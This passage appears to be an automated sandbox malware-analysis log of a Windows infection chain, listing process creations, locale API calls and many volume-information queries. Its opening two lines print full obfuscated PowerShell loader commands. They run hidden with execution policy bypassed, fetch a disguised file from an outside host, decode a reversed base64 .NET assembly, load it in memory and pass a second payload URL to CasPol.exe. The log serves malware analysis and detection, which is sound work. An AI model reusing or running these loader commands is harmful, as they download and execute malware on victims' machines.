                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnmmtkaw1hzycrj2vvcmwgpsblqzrodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxllycrj2dldd9mawxla2v5pxmnkydovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjrotutjysnzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yyblqzq7mmtkd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsya2rpbwfnzuj5dgvzid0gmmtkd2viq2xpzw50lkrvdycrj24nkydsb2fkrgf0ysgya2rpbwfnzvvybck7mmtkaw1hz2vuzxh0id0gjysnw1n5c3rlbs5uzscrj3h0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcommtkaw1hz2vcexrlcycrjyk7mmtkc3rhcnrgbgfnid0gzum0pdxcqvnfnjrfu1rbulq+pmvdjysnndsya2rlbmrgbgfnid0gzum0pdxcqvnfnjrfru5epj5lqzq7mmtkc3rhcnrjbmrleca9idjrzgltywdlvgv4dc5jbmrlee9mkdjrzhn0yxj0rmxhzyk7mmtkzscrj24nkydksw5kzxggpsaya2rpbwfnzvrlehqusw5kzxgnkydpzigya2rlbmrgbgenkydnktsya2rzdgfydeluzgv4ic1nzsawic1hbmqgmmtkzw5ksw5kzxgglwd0idjrzhn0yxinkyd0sw5kzxg7mmtkc3rhcnrjbmrlecarpsaya2rzdgfydezsywcutgvuz3qnkydoozjrzgjhc2u2nexlbmd0aca9idjrzgvuzeluzgv4ic0gmmtkc3rhcnrjbmrledsya2riyxnlnjrdb21tyw5kid0gmmsnkydkaw1hz2vujysnzxh0lln1ynn0cmluzygya2rzdgfydeluzgv4lcaya2riyxnlnjrmzw5ndggpozjrzgjhc2u2nfjljysndmvyc2vkid0glwpvaw4gkdjrzgjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbzevygrm9yrwfjac1pymply3qgeyaya2rfih0pwy0xli4tkdjrzgjhc2u2nenvbw1hbmqutgvuz3rokv07mmtky29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhcycrj2u2nfn0cmluzygya2riyxnlnjrszxzlcnnlzck7mmtkbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkdjrzgnvbw1hbmrcexrlcyk7mmtkdmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchlqzrwqullqzqpozjrzhzhau1ldghvzc5jbnzva2uojysnmmtkbnvsbcwgqchlqzr0ehqurkdwr0zslziyndevnjiunjquoccrjzyxljqwms8vonb0dghlqzqsigvdngrlc2f0axzhzg9lqzqsigvdngrlc2f0axzhzg9lqzqsigvdngrlc2f0axzhzg9lqzqsjysnigvdnenhc1bvbgvdncwgzum0zgvzyxrpdmfkb2vdncwgzum0zgvzyxrpdmfkb2vdncxlqycrjzrkzxnhdgl2ywrvjysnzum0lgvdngrlc2f0ascrj3zhzg9lqzqszum0zgvzyxrpdmfkb2vdncxlqzrkzxnhdgl2ywrvzum0lgvdngrlc2f0axzhzg9lqycrjzqszum0mwvdncxlqzrkzxnhdgl2ywrvzum0ksk7jykgic1jcmvwbefdzsagkftjaefsxtexnstby2hbul0xmjerw2noqvjdodyplftjaefsxteyncaglvjluexby2ugichby2hbul01mctby2hbul0xmdcrw2noqvjdmtawksxby2hbul0zniaty3jlcgxbq2unzum0jyxby2hbul0zosl8ic4okgd2iccqturykicplk5btwvbmywxmswyxs1qt2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('2kdimag'+'eurl = ec4https://3105.filemail.com/api/file/'+'get?filekey=s'+'htphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq95-'+'dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c ec4;2kdwebclient = new-object system.net.webclient;2kdimagebytes = 2kdwebclient.dow'+'n'+'loaddata(2kdimageurl);2kdimagetext = '+'[system.te'+'xt.encoding]::utf8.getstring(2kdimagebytes'+');2kdstartflag = ec4<<base64_start>>ec'+'4;2kdendflag = ec4<<base64_end>>ec4;2kdstartindex = 2kdimagetext.indexof(2kdstartflag);2kde'+'n'+'dindex = 2kdimagetext.index'+'of(2kdendfla'+'g);2kdstartindex -ge 0 -and 2kdendindex -gt 2kdstar'+'tindex;2kdstartindex += 2kdstartflag.lengt'+'h;2kdbase64length = 2kdendindex - 2kdstartindex;2kdbase64command = 2k'+'dimaget'+'ext.substring(2kdstartindex, 2kdbase64length);2kdbase64re'+'versed = -join (2kdbase64command.tochararray() syv foreach-object { 2kd_ })[-1..-(2kdbase64command.length)];2kdcommandbytes = [system.convert]::frombas'+'e64string(2kdbase64reversed);2kdloadedassembly = [system.reflection.assembly]::load(2kdcommandbytes);2kdvaimethod = [dnlib.io.home].getmethod(ec4vaiec4);2kdvaimethod.invoke('+'2kdnull, @(ec4txt.fgvgfr/2241/62.64.8'+'61.401//:ptthec4, ec4desativadoec4, ec4desativadoec4, ec4desativadoec4,'+' ec4caspolec4, ec4desativadoec4, ec4desativadoec4,ec'+'4desativado'+'ec4,ec4desati'+'vadoec4,ec4desativadoec4,ec4desativadoec4,ec4desativadoec'+'4,ec41ec4,ec4desativadoec4));') -creplace ([char]115+[char]121+[char]86),[char]124 -replace ([char]50+[char]107+[char]100),[char]36 -creplace'ec4',[char]39)| .((gv '*mdr*').name[3,11,2]-join'')"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00433E0A cpuid 13_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,13_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,13_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,13_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,13_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,13_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,13_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,13_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,13_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
